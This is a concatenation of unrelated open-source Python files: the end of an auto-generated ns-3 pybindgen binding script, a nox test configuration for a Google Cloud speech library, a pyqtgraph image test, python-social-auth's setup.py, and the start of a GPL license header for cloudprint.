cls.add_method('GetLambda',
'double',
[],
is_const=True)
## propagation-loss-model.h (module 'propagation'): double ns3::FriisPropagationLossModel::GetSystemLoss() const [member function]
cls.add_method('GetSystemLoss',
'double',
[],
is_const=True)
## propagation-loss-model.h (module 'propagation'): double ns3::FriisPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3ItuR1411LosPropagationLossModel_methods(root_module, cls):
## itu-r-1411-los-propagation-loss-model.h (module 'propagation'): ns3::ItuR1411LosPropagationLossModel::ItuR1411LosPropagationLossModel() [constructor]
cls.add_constructor([])
## itu-r-1411-los-propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::ItuR1411LosPropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## itu-r-1411-los-propagation-loss-model.h (module 'propagation'): void ns3::ItuR1411LosPropagationLossModel::SetFrequency(double freq) [member function]
cls.add_method('SetFrequency',
'void',
[param('double', 'freq')])
## itu-r-1411-los-propagation-loss-model.h (module 'propagation'): double ns3::ItuR1411LosPropagationLossModel::GetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('GetLoss',
'double',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True)
## itu-r-1411-los-propagation-loss-model.h (module 'propagation'): double ns3::ItuR1411LosPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3ItuR1411NlosOverRooftopPropagationLossModel_methods(root_module, cls):
## itu-r-1411-nlos-over-rooftop-propagation-loss-model.h (module 'propagation'): ns3::ItuR1411NlosOverRooftopPropagationLossModel::ItuR1411NlosOverRooftopPropagationLossModel() [constructor]
cls.add_constructor([])
## itu-r-1411-nlos-over-rooftop-propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::ItuR1411NlosOverRooftopPropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## itu-r-1411-nlos-over-rooftop-propagation-loss-model.h (module 'propagation'): void ns3::ItuR1411NlosOverRooftopPropagationLossModel::SetFrequency(double freq) [member function]
cls.add_method('SetFrequency',
'void',
[param('double', 'freq')])
## itu-r-1411-nlos-over-rooftop-propagation-loss-model.h (module 'propagation'): double ns3::ItuR1411NlosOverRooftopPropagationLossModel::GetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('GetLoss',
'double',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True)
## itu-r-1411-nlos-over-rooftop-propagation-loss-model.h (module 'propagation'): double ns3::ItuR1411NlosOverRooftopPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3JakesProcess_methods(root_module, cls):
## jakes-process.h (module 'propagation'): ns3::JakesProcess::JakesProcess(ns3::JakesProcess const & arg0) [copy constructor]
cls.add_constructor([param('ns3::JakesProcess const &', 'arg0')])
## jakes-process.h (module 'propagation'): ns3::JakesProcess::JakesProcess() [constructor]
cls.add_constructor([])
## jakes-process.h (module 'propagation'): double ns3::JakesProcess::GetChannelGainDb() const [member function]
cls.add_method('GetChannelGainDb',
'double',
[],
is_const=True)
## jakes-process.h (module 'propagation'): std::complex<double> ns3::JakesProcess::GetComplexGain() const [member function]
cls.add_method('GetComplexGain',
'std::complex< double >',
[],
is_const=True)
## jakes-process.h (module 'propagation'): static ns3::TypeId ns3::JakesProcess::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3JakesPropagationLossModel_methods(root_module, cls):
## jakes-propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::JakesPropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## jakes-propagation-loss-model.h (module 'propagation'): ns3::JakesPropagationLossModel::JakesPropagationLossModel() [constructor]
cls.add_constructor([])
## jakes-propagation-loss-model.h (module 'propagation'): double ns3::JakesPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3Kun2600MhzPropagationLossModel_methods(root_module, cls):
## kun-2600-mhz-propagation-loss-model.h (module 'propagation'): ns3::Kun2600MhzPropagationLossModel::Kun2600MhzPropagationLossModel() [constructor]
cls.add_constructor([])
## kun-2600-mhz-propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::Kun2600MhzPropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## kun-2600-mhz-propagation-loss-model.h (module 'propagation'): double ns3::Kun2600MhzPropagationLossModel::GetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('GetLoss',
'double',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True)
## kun-2600-mhz-propagation-loss-model.h (module 'propagation'): double ns3::Kun2600MhzPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3LogDistancePropagationLossModel_methods(root_module, cls):
## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::LogDistancePropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-loss-model.h (module 'propagation'): ns3::LogDistancePropagationLossModel::LogDistancePropagationLossModel() [constructor]
cls.add_constructor([])
## propagation-loss-model.h (module 'propagation'): void ns3::LogDistancePropagationLossModel::SetPathLossExponent(double n) [member function]
cls.add_method('SetPathLossExponent',
'void',
[param('double', 'n')])
## propagation-loss-model.h (module 'propagation'): double ns3::LogDistancePropagationLossModel::GetPathLossExponent() const [member function]
cls.add_method('GetPathLossExponent',
'double',
[],
is_const=True)
## propagation-loss-model.h (module 'propagation'): void ns3::LogDistancePropagationLossModel::SetReference(double referenceDistance, double referenceLoss) [member function]
cls.add_method('SetReference',
'void',
[param('double', 'referenceDistance'), param('double', 'referenceLoss')])
## propagation-loss-model.h (module 'propagation'): double ns3::LogDistancePropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3MatrixPropagationLossModel_methods(root_module, cls):
## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::MatrixPropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-loss-model.h (module 'propagation'): ns3::MatrixPropagationLossModel::MatrixPropagationLossModel() [constructor]
cls.add_constructor([])
## propagation-loss-model.h (module 'propagation'): void ns3::MatrixPropagationLossModel::SetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, double loss, bool symmetric=true) [member function]
cls.add_method('SetLoss',
'void',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('double', 'loss'), param('bool', 'symmetric', default_value='true')])
## propagation-loss-model.h (module 'propagation'): void ns3::MatrixPropagationLossModel::SetDefaultLoss(double arg0) [member function]
cls.add_method('SetDefaultLoss',
'void',
[param('double', 'arg0')])
## propagation-loss-model.h (module 'propagation'): double ns3::MatrixPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3MobilityModel_methods(root_module, cls):
## mobility-model.h (module 'mobility'): ns3::MobilityModel::MobilityModel(ns3::MobilityModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::MobilityModel const &', 'arg0')])
## mobility-model.h (module 'mobility'): ns3::MobilityModel::MobilityModel() [constructor]
cls.add_constructor([])
## mobility-model.h (module 'mobility'): double ns3::MobilityModel::GetDistanceFrom(ns3::Ptr<ns3::MobilityModel const> position) const [member function]
cls.add_method('GetDistanceFrom',
'double',
[param('ns3::Ptr< ns3::MobilityModel const >', 'position')],
is_const=True)
## mobility-model.h (module 'mobility'): ns3::Vector ns3::MobilityModel::GetPosition() const [member function]
cls.add_method('GetPosition',
'ns3::Vector',
[],
is_const=True)
## mobility-model.h (module 'mobility'): double ns3::MobilityModel::GetRelativeSpeed(ns3::Ptr<ns3::MobilityModel const> other) const [member function]
cls.add_method('GetRelativeSpeed',
'double',
[param('ns3::Ptr< ns3::MobilityModel const >', 'other')],
is_const=True)
## mobility-model.h (module 'mobility'): static ns3::TypeId ns3::MobilityModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## mobility-model.h (module 'mobility'): ns3::Vector ns3::MobilityModel::GetVelocity() const [member function]
cls.add_method('GetVelocity',
'ns3::Vector',
[],
is_const=True)
## mobility-model.h (module 'mobility'): void ns3::MobilityModel::SetPosition(ns3::Vector const & position) [member function]
cls.add_method('SetPosition',
'void',
[param('ns3::Vector const &', 'position')])
## mobility-model.h (module 'mobility'): void ns3::MobilityModel::NotifyCourseChange() const [member function]
cls.add_method('NotifyCourseChange',
'void',
[],
is_const=True, visibility='protected')
## mobility-model.h (module 'mobility'): ns3::Vector ns3::MobilityModel::DoGetPosition() const [member function]
cls.add_method('DoGetPosition',
'ns3::Vector',
[],
is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
## mobility-model.h (module 'mobility'): ns3::Vector ns3::MobilityModel::DoGetVelocity() const [member function]
cls.add_method('DoGetVelocity',
'ns3::Vector',
[],
is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
## mobility-model.h (module 'mobility'): void ns3::MobilityModel::DoSetPosition(ns3::Vector const & position) [member function]
cls.add_method('DoSetPosition',
'void',
[param('ns3::Vector const &', 'position')],
is_pure_virtual=True, visibility='private', is_virtual=True)
return
def register_Ns3NakagamiPropagationLossModel_methods(root_module, cls):
## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::NakagamiPropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-loss-model.h (module 'propagation'): ns3::NakagamiPropagationLossModel::NakagamiPropagationLossModel() [constructor]
cls.add_constructor([])
## propagation-loss-model.h (module 'propagation'): double ns3::NakagamiPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3OkumuraHataPropagationLossModel_methods(root_module, cls):
## okumura-hata-propagation-loss-model.h (module 'propagation'): ns3::OkumuraHataPropagationLossModel::OkumuraHataPropagationLossModel() [constructor]
cls.add_constructor([])
## okumura-hata-propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::OkumuraHataPropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## okumura-hata-propagation-loss-model.h (module 'propagation'): double ns3::OkumuraHataPropagationLossModel::GetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('GetLoss',
'double',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True)
## okumura-hata-propagation-loss-model.h (module 'propagation'): double ns3::OkumuraHataPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3RandomVariableChecker_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::RandomVariableChecker::RandomVariableChecker() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::RandomVariableChecker::RandomVariableChecker(ns3::RandomVariableChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::RandomVariableChecker const &', 'arg0')])
return
def register_Ns3RandomVariableValue_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::RandomVariableValue::RandomVariableValue() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::RandomVariableValue::RandomVariableValue(ns3::RandomVariableValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::RandomVariableValue const &', 'arg0')])
## random-variable.h (module 'core'): ns3::RandomVariableValue::RandomVariableValue(ns3::RandomVariable const & value) [constructor]
cls.add_constructor([param('ns3::RandomVariable const &', 'value')])
## random-variable.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::RandomVariableValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## random-variable.h (module 'core'): bool ns3::RandomVariableValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## random-variable.h (module 'core'): ns3::RandomVariable ns3::RandomVariableValue::Get() const [member function]
cls.add_method('Get',
'ns3::RandomVariable',
[],
is_const=True)
## random-variable.h (module 'core'): std::string ns3::RandomVariableValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## random-variable.h (module 'core'): void ns3::RandomVariableValue::Set(ns3::RandomVariable const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::RandomVariable const &', 'value')])
return
def register_Ns3TimeChecker_methods(root_module, cls):
## nstime.h (module 'core'): ns3::TimeChecker::TimeChecker() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::TimeChecker::TimeChecker(ns3::TimeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TimeChecker const &', 'arg0')])
return
def register_Ns3TimeValue_methods(root_module, cls):
## nstime.h (module 'core'): ns3::TimeValue::TimeValue() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::TimeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TimeValue const &', 'arg0')])
## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::Time const & value) [constructor]
cls.add_constructor([param('ns3::Time const &', 'value')])
## nstime.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TimeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## nstime.h (module 'core'): bool ns3::TimeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## nstime.h (module 'core'): ns3::Time ns3::TimeValue::Get() const [member function]
cls.add_method('Get',
'ns3::Time',
[],
is_const=True)
## nstime.h (module 'core'): std::string ns3::TimeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## nstime.h (module 'core'): void ns3::TimeValue::Set(ns3::Time const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Time const &', 'value')])
return
def register_Ns3TypeIdChecker_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')])
return
def register_Ns3TypeIdValue_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor]
cls.add_constructor([param('ns3::TypeId const &', 'value')])
## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function]
cls.add_method('Get',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::TypeId const &', 'value')])
return
def register_Ns3Vector2DChecker_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector2DChecker::Vector2DChecker() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector2DChecker::Vector2DChecker(ns3::Vector2DChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector2DChecker const &', 'arg0')])
return
def register_Ns3Vector2DValue_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue(ns3::Vector2DValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector2DValue const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue(ns3::Vector2D const & value) [constructor]
cls.add_constructor([param('ns3::Vector2D const &', 'value')])
## vector.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::Vector2DValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## vector.h (module 'core'): bool ns3::Vector2DValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## vector.h (module 'core'): ns3::Vector2D ns3::Vector2DValue::Get() const [member function]
cls.add_method('Get',
'ns3::Vector2D',
[],
is_const=True)
## vector.h (module 'core'): std::string ns3::Vector2DValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## vector.h (module 'core'): void ns3::Vector2DValue::Set(ns3::Vector2D const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Vector2D const &', 'value')])
return
def register_Ns3Vector3DChecker_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector3DChecker::Vector3DChecker() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector3DChecker::Vector3DChecker(ns3::Vector3DChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector3DChecker const &', 'arg0')])
return
def register_Ns3Vector3DValue_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue(ns3::Vector3DValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector3DValue const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue(ns3::Vector3D const & value) [constructor]
cls.add_constructor([param('ns3::Vector3D const &', 'value')])
## vector.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::Vector3DValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## vector.h (module 'core'): bool ns3::Vector3DValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## vector.h (module 'core'): ns3::Vector3D ns3::Vector3DValue::Get() const [member function]
cls.add_method('Get',
'ns3::Vector3D',
[],
is_const=True)
## vector.h (module 'core'): std::string ns3::Vector3DValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## vector.h (module 'core'): void ns3::Vector3DValue::Set(ns3::Vector3D const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Vector3D const &', 'value')])
return
def register_functions(root_module):
module = root_module
register_functions_ns3_FatalImpl(module.get_submodule('FatalImpl'), root_module)
return
def register_functions_ns3_FatalImpl(module, root_module):
return
def main():
out = FileCodeSink(sys.stdout)
root_module = module_init()
register_types(root_module)
register_methods(root_module)
register_functions(root_module)
root_module.generate(out)
if __name__ == '__main__':
main()
|
tartavull/google-cloud-python
|
refs/heads/master
|
speech/nox.py
|
2
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import os
import nox
LOCAL_DEPS = ('../core/',)
@nox.session
@nox.parametrize('python_version', ['2.7', '3.4', '3.5', '3.6'])
def unit_tests(session, python_version):
"""Run the unit test suite."""
# Run unit tests against all supported versions of Python.
session.interpreter = 'python{}'.format(python_version)
# Set the virtualenv dirname.
session.virtualenv_dirname = 'unit-' + python_version
# Install all test dependencies, then install this package in-place.
session.install('mock', 'pytest', 'pytest-cov', *LOCAL_DEPS)
session.install('-e', '.')
# Run py.test against the unit tests.
session.run(
'py.test', '--quiet',
'--cov=google.cloud.speech',
'--cov=google.cloud.speech_v1',
'--cov=tests.unit'
'--cov-append',
'--cov-config=.coveragerc',
'--cov-report=',
'--cov-fail-under=0',
os.path.join('tests', 'unit'),
)
@nox.session
@nox.parametrize('python_version', ['2.7', '3.6'])
def system_tests(session, python_version):
"""Run the system test suite."""
# Sanity check: Only run system tests if the environment variable is set.
if not os.environ.get('GOOGLE_APPLICATION_CREDENTIALS', ''):
session.skip('Credentials must be set via environment variable.')
# Run the system tests against latest Python 2 and Python 3 only.
session.interpreter = 'python{}'.format(python_version)
# Set the virtualenv dirname.
session.virtualenv_dirname = 'sys-' + python_version
# Install all test dependencies, then install this package into the
# virutalenv's dist-packages.
session.install('mock', 'pytest', *LOCAL_DEPS)
session.install('../test_utils/', '../storage/')
session.install('.')
# Run py.test against the system tests.
session.run('py.test', '--quiet', 'tests/system.py')
@nox.session
def lint(session):
"""Run linters.
Returns a failure if the linters find linting errors or sufficiently
serious code quality issues.
"""
session.interpreter = 'python3.6'
session.install('flake8', 'pylint', 'gcp-devrel-py-tools', *LOCAL_DEPS)
session.install('.')
session.run('flake8', 'google/cloud/speech')
session.run(
'gcp-devrel-py-tools', 'run-pylint',
'--config', 'pylint.config.py',
'--library-filesets', 'google',
'--test-filesets', 'tests',
# Temporarily allow this to fail.
success_codes=range(0, 100))
@nox.session
def lint_setup_py(session):
"""Verify that setup.py is valid (including RST check)."""
session.interpreter = 'python3.6'
# Set the virtualenv dirname.
session.virtualenv_dirname = 'setup'
session.install('docutils', 'Pygments')
session.run(
'python', 'setup.py', 'check', '--restructuredtext', '--strict')
@nox.session
def cover(session):
"""Run the final coverage report.
This outputs the coverage report aggregating coverage from the unit
test runs (not system test runs), and then erases coverage data.
"""
session.interpreter = 'python3.6'
session.chdir(os.path.dirname(__file__))
session.install('coverage', 'pytest-cov')
session.run('coverage', 'report', '--show-missing', '--fail-under=100')
session.run('coverage', 'erase')
|
TUB-Control/PaPI
|
refs/heads/master
|
papi/pyqtgraph/imageview/tests/test_imageview.py
|
33
|
import pyqtgraph as pg
import numpy as np
app = pg.mkQApp()
def test_nan_image():
img = np.ones((10,10))
img[0,0] = np.nan
v = pg.image(img)
app.processEvents()
v.window().close()
|
jeyraof/python-social-auth
|
refs/heads/master
|
setup.py
|
47
|
# -*- coding: utf-8 -*-
"""Setup file for easy installation"""
import sys
import os
from os.path import join, dirname, split
from setuptools import setup
PY3 = os.environ.get('BUILD_VERSION') == '3' or sys.version_info[0] == 3
version = __import__('social').__version__
LONG_DESCRIPTION = """
Python Social Auth is an easy to setup social authentication/registration
mechanism with support for several frameworks and auth providers.
Crafted using base code from django-social-auth, implements a common interface
to define new authentication providers from third parties. And to bring support
for more frameworks and ORMs.
"""
def long_description():
"""Return long description from README.rst if it's present
because it doesn't get installed."""
try:
return open(join(dirname(__file__), 'README.rst')).read()
except IOError:
return LONG_DESCRIPTION
def path_tokens(path):
if not path:
return []
head, tail = split(path)
return path_tokens(head) + [tail]
def get_packages():
exclude_pacakages = ('__pycache__',)
packages = []
for path_info in os.walk('social'):
tokens = path_tokens(path_info[0])
if tokens[-1] not in exclude_pacakages:
packages.append('.'.join(tokens))
return packages
requirements_file, tests_requirements_file = {
False: ('requirements.txt', 'social/tests/requirements.txt'),
True: ('requirements-python3.txt', 'social/tests/requirements-python3.txt')
}[PY3]
with open(requirements_file, 'r') as f:
requirements = f.readlines()
with open(tests_requirements_file, 'r') as f:
tests_requirements = [line for line in f.readlines() if '@' not in line]
setup(
name='python-social-auth',
version=version,
author='Matias Aguirre',
author_email='matiasaguirre@gmail.com',
description='Python social authentication made simple.',
license='BSD',
keywords='django, flask, pyramid, webpy, openid, oauth, social auth',
url='https://github.com/omab/python-social-auth',
packages=get_packages(),
long_description=long_description(),
install_requires=requirements,
classifiers=[
'Development Status :: 4 - Beta',
'Topic :: Internet',
'License :: OSI Approved :: BSD License',
'Intended Audience :: Developers',
'Environment :: Web Environment',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3'
],
package_data={
'social/tests': ['social/tests/*.txt']
},
include_package_data=True,
tests_require=tests_requirements,
test_suite='social.tests',
zip_safe=False
)
|
davesteele/cloudprint-service
|
refs/heads/master
|
cloudprint/__init__.py
|
6
|
# Copyright 2014 Jason Michalski <armooo@armooo.net>
#
# This file is part of cloudprint.
#
# cloudprint is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# cloudprint is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
